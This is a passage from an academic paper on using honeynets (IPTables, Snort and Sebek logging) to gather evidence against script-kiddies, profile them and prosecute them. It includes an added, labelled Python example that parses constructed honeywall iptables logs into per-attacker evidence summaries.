Snort, would monitor any network level activity (Know Your Enemy: GenII Honeynets 2005).
However, the script-kiddie’s activities inside the honeynet itself cannot be monitored by the honeywall.
If the script-kiddie is using an unencrypted shell such as telnet to communicate with a honeypot, Snort
would be able to capture his activities successfully. But most of the time they use encrypted
connections, which render network-level packet sniffers ineffective.
Therefore any automated scripts and the script-kiddie’s keystrokes have to be captured inside the
honeynet itself, right after they are decrypted. For that, Sebek, a kernel-level data capture tool,
would be used. Sebek would secretly record any keystrokes and scripts of the attacker, and would
transmit them to the remote management server (Know Your Enemy: GenII Honeynets 2005).
In addition to storing data, as already mentioned under ‘Architecture of the honeynet’, the remote
management server can be used to control the honeynet through a remote connection.
4.2.2: Evidence Gathering
All the data gathered by IPTables, Snort and Sebek will be transferred to the remote management
server. This is to reduce the chances of detection and to ensure that the script-kiddie will not be able
to modify or destroy the collected evidence. Since all the data collected at the network level and the
host level, and from the different honeypots, is in a centralised location, analysis is made easier.
When designing the honeynet, the method of inductive profiling was used in order to attract the
script-kiddies. The honeynet was designed according to the interests, motives and characteristics of
the script-kiddies so that they would be attracted to it. But now it is time to gauge the success of the
profiling method used, that is, to measure how successfully it attracted their interest. Since there is
now a crime scene and a snapshot of the criminal’s behaviour, it is possible to see whether the captured
behaviour and the crime scene leftovers match the profile designed earlier.
After analysing the log files of IPTables, Snort and Sebek, it is possible to find who hacked into the
honeynet (IP address), when he hacked into it, the tools he used, how he gained access, the timeline of
the events and from where he gained access.
In addition to those details, it is even possible to deduce why he hacked and his characteristics by
observing his behaviour. In other words, it is now possible to build the criminal’s profile using
deductive profiling. For instance, if the logs reveal that the hacker has specifically targeted this
honeypot, it can be assumed that he is most likely not a script-kiddie. By observing the timeline of the
events, it is also possible to get a rough idea about the hacker. As an example, if the attacker is only
present in the early mornings and late at night, he might be a student or someone who is employed.
In addition, the information the attacker searched for and his actions would also help in profiling him.
For instance, if he searched for a specific object, then he may not be in the honeynet by pure
opportunity. If he was looking for common files such as mp3s, movies and credit card numbers,
chances are he ended up in the honeypot randomly and therefore he could be a script-kiddie. If the
attacker performed destructive activities, it can be assumed that he is driven by anger.
Furthermore, even the way a hacker hesitates, handles mistakes, and his FTP user name and
password (most of the time hackers use FTP to download rootkits and other tools) can reveal
valuable information about him (Romney et al. 2005).
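The evidence-gathering step above can be partly automated. The following Python script is an added example, not code from the paper or from the Honeynet Project: it parses iptables LOG lines of the kind the honeywall writes to /var/log/messages and answers who (IP address), when (first and last seen, hours of activity), which honeypot services were hit and which outbound connections (FTP, IRC and so on) were made from the honeypots the attacker had reached, and flags honeypots that used up their outbound budget. The log lines, addresses, the "HONEYWALL" log prefix and the outbound limit are all constructed for this example.

```python
import re
from collections import Counter
from datetime import datetime

# Constructed iptables LOG lines as the honeywall writes them to /var/log/messages
# (the "HONEYWALL" prefix, addresses and timestamps are made up for this example).
SAMPLE_LOG = """\
May  2 01:58:07 honeywall kernel: HONEYWALL IN=eth0 OUT=eth1 SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP SPT=51234 DPT=22
May  2 01:58:09 honeywall kernel: HONEYWALL IN=eth0 OUT=eth1 SRC=203.0.113.7 DST=192.0.2.11 PROTO=TCP SPT=51235 DPT=80
May  2 02:20:41 honeywall kernel: HONEYWALL IN=eth1 OUT=eth0 SRC=192.0.2.10 DST=198.51.100.5 PROTO=TCP SPT=40001 DPT=21
May  2 02:21:03 honeywall kernel: HONEYWALL IN=eth1 OUT=eth0 SRC=192.0.2.10 DST=198.51.100.9 PROTO=TCP SPT=40002 DPT=6667
May  2 23:40:15 honeywall kernel: HONEYWALL IN=eth0 OUT=eth1 SRC=203.0.113.7 DST=192.0.2.10 PROTO=TCP SPT=51900 DPT=22
May  2 23:41:02 honeywall kernel: HONEYWALL IN=eth1 OUT=eth0 SRC=192.0.2.10 DST=198.51.100.5 PROTO=TCP SPT=40003 DPT=21
"""
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ kernel: .*?IN=(?P<in>\S*) OUT=\S* "
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) .*?PROTO=(?P<proto>\S+)(?: SPT=\d+ DPT=(?P<dpt>\d+))?")
HONEYNET_IF = "eth1"   # honeywall interface bridged towards the honeypots (eth1 in the paper)
OUTBOUND_LIMIT = 3     # assumed per-honeypot outbound connection budget (constructed value)

def parse_events(text, year=2009):
    """Syslog lines -> event dicts; a packet entering on the honeynet interface is outbound."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S"),
            "dir": "outbound" if m["in"] == HONEYNET_IF else "inbound",
            "src": m["src"], "dst": m["dst"], "proto": m["proto"],
            "dpt": int(m["dpt"]) if m["dpt"] else None})
    return sorted(events, key=lambda e: e["ts"])

def build_evidence(events, limit=OUTBOUND_LIMIT):
    """Per attacker IP: first/last seen, active hours, honeypot services hit and the egress
    (ftp, irc, ...) from honeypots he reached; plus honeypots that exhausted their budget."""
    attackers, outbound, last_visitor = {}, Counter(), {}
    for e in events:
        if e["dir"] == "inbound":
            a = attackers.setdefault(e["src"], {"first_seen": e["ts"], "last_seen": e["ts"],
                                                "services": set(), "hours": Counter(), "outbound": []})
            a["last_seen"] = e["ts"]
            a["services"].add((e["dst"], e["dpt"]))
            a["hours"][e["ts"].hour] += 1
            last_visitor[e["dst"]] = e["src"]   # attribute later egress from this honeypot to him
        else:
            outbound[e["src"]] += 1
            if e["src"] in last_visitor:
                attackers[last_visitor[e["src"]]]["outbound"].append((e["dst"], e["dpt"]))
    over_budget = {hp for hp, n in outbound.items() if n >= limit}
    return attackers, over_budget
```

Attributing egress to the last attacker seen reaching that honeypot is a heuristic; Sebek keystroke data would confirm the link in practice.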
4.2.3: Identity Identification
As the exact information about the attacker, such as his IP address, and deduced information, such as
his potential profile, were identified in the ‘Evidence Gathering’ stage, it is possible to trace back the
attacker. Further information about the black-hat can be obtained by contacting the ISP responsible for
that IP address. This information will then be provided to the authorities. The authorities would charge
the attacker based on his activities captured by the honeynet.
4.3: The Laws against the Script-kiddie
A script-kiddie can mainly be prosecuted under the ‘Computer Fraud and Abuse Act’ in the USA and
under the ‘Computer Misuse Act’ in the UK. The ‘Computer Fraud and Abuse Act’ can be further
broken down into three sub-acts. Those are ‘Unlawful Access to Information act’, ‘Unlawful Access
to Obtain Something of Value act’ and ‘Unlawful Access Causing Damage act’ (Wittliff 2003). The
‘Computer Misuse Act’ mentions three computer misuses. Those are ‘Unauthorised access to a
computer system’, ‘Unauthorised access with intent to commit or facilitate commission of further
offences’ and ‘Unauthorised modification of computer material’. Based on the script-kiddie’s
activities inside the honeynet, he can be charged under one or more of those acts.
However, the criminal can raise the defence of entrapment against the evidence collected from a
honeynet. In order to get the best use out of a honeynet, it has to be probed or attacked. Therefore
developers often promote honeynets among the hacker community. So the criminal can argue that he
was tempted by the honeynet into performing something that he would not have done otherwise.
5: Conclusion
With the rapid development of the internet and the associated technologies, there has also been an
equal, if not greater, increase in cyber crimes. Cyber-criminals are increasing at an alarming rate as
a result of freely available tools and guides on the internet. Every day new tools and exploits are being
released, making it next to impossible for system administrators to familiarise themselves with these
exploits and to stay on par with the hackers.
As a result, the concept of honeypots was developed. The concept of a honeypot is quite simple. It is a
resource made available to the public so that it might attract cyber-criminals, providing them with a
virtual environment that they can interact with. Though not a novel concept, the latest honeypots, the
honeynets, provide some of the most promising features in terms of criminal profiling. Unlike the
earlier honeypots, they are highly interactive, easy to install, easy to maintain and inexpensive. They
work straight out of the box and even come as a complete package on a CD-ROM, as opposed to earlier
honeypots where the individual components had to be installed and configured separately. The new
honeypots are capable of capturing extensive information about the criminals, thus making criminal
profiling easier.
Criminal profiling, on the other hand, can be seen as providing criminals with a unique signature based
on their characteristics such as skills, motivations, resources and knowledge. Criminal profiling would
help in better understanding the cyber-criminals. Understanding the cyber-criminals and their
behaviour would undoubtedly help organisations to safeguard their networks.
It is clear that the information gathered from the latest honeynets and criminal profiling strategies
would undoubtedly make a hacker’s life hard. But current honeynet developers tend to focus overly on
a single aspect of the honeynet. They are continuously focusing on the honeynet itself, and looking for
more sophisticated capturing tools (Raynal et al). But the author believes that future research on
honeynets has to be oriented more towards developing tools that are capable of analysing the captured
data more comprehensively.
6. References
Agar, J 2003, Constant Touch: A Global History of the Mobile Phone, Icon Books, UK.
Bartz, D 2009, Study finds software piracy growing. Retrieved April 28, 2009 from
http://uk.news.yahoo.com/22/20090512/ttc-study-finds-software-piracy-growing-fe50bdd.html
Chiesa, R, Ducci, S & Ciappi, S 2007, Profiling Hackers, Auerbach Publications, Broken Sound
Parkway.
Douglas, T 2002, Hacker Culture, University of Minnesota Press, Minnesota.
Hazelwood, RR & Burgess, AW 2009, Practical Aspects of Rape Investigation, Taylor & Francis
Group, Broken Sound Parkway.
Janczewski, LJ & Colarik, A 2005, Managerial Guide for Handling Cyber-Terrorism and Information
Warfare, Idea Group Publishing, Hershey.
Know Your Enemy: Defining Virtual Honeynets 2003. Retrieved May 2, 2009 from
http://old.honeynet.org/papers/virtual/
Know Your Enemy: GenII Honeynets 2005. Retrieved May 2, 2009 from
http://old.honeynet.org/papers/gen2/
Know Your Enemy: Honeynets 2006. Retrieved May 2, 2009 from
http://old.honeynet.org/papers/honeynet/
Research Shows Global Recession Increasing Risks to Intellectual Property 2009. Retrieved April 28,
2009 from http://www.mcafee.com/us/about/press/corporate/2009/20090129_063500_j.html
Romney, GW, Jeremiah, JK, Brandon, LR & MacCabe, P 2005, IT Security Education is Enhanced
by Analyzing Honeynet Data, IEEE, USA.
Spitzner, L 2003, Honeypots: Definitions and Value of Honeypots. Retrieved April 28, 2009 from
http://www.tracking-hackers.com/papers/honeypots.html
Wittliff, WR 2003, Computer Hacking and Liability Issues: When Does Liability Attach?. Retrieved
May 5, 2009 from http://www.gdhm.com/pdf/wrw-hack_article.pdf